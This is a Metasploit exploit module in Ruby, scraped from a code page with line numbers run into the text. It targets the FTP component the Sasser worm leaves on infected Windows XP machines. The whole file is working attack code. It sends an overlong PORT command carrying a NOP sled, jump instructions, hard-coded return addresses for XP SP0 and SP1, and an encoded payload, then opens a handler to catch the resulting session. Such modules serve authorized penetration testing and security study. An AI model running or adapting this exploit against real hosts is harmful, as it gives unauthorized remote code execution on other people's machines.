Path: blob/master/modules/exploits/windows/ftp/sasser_ftpd_port.rb
19778 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = AverageRanking78include Msf::Exploit::Remote::Ftp910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Sasser Worm avserve FTP PORT Buffer Overflow',15'Description' => %q{16This module exploits the FTP server component of the Sasser worm.17By sending an overly long PORT command the stack can be overwritten.18},19'Author' => [ '<valsmith[at]metasploit.com>', '<chamuco[at]gmail.com>', 'aushack' ],20'Arch' => [ ARCH_X86 ],21'License' => MSF_LICENSE,22'References' => [23[ 'OSVDB', '6197'],24],25'DefaultOptions' => {26'EXITFUNC' => 'thread',27},28'Platform' => ['win'],29'Privileged' => false,30'Payload' => {31'Space' => 480,32'BadChars' => "\x00~+&=%\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",33'StackAdjustment' => -3500,34},35'Targets' => [36[ 'Windows XP SP0', { 'Ret' => 0x71aa32ad } ], # p/p/r ws2help.dll37[ 'Windows XP SP1', { 'Ret' => 0x77e7633a } ], # p/p/r38],39'DisclosureDate' => '2004-05-10',40'DefaultTarget' => 1,41'Notes' => {42'Reliability' => UNKNOWN_RELIABILITY,43'Stability' => UNKNOWN_STABILITY,44'SideEffects' => UNKNOWN_SIDE_EFFECTS45}46)47)4849register_options(50[51Opt::RPORT(5554),52]53)54end5556def exploit57connect5859print_status("Trying target #{target.name}...")6061sploit = make_nops(267) + Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target['Ret']].pack('V')62sploit << Rex::Arch::X86.jmp(0xfffffc13) + make_nops(15) + payload.encoded + make_nops(1530)6364send_cmd(['PORT', sploit], false)6566handler67disconnect68end69end707172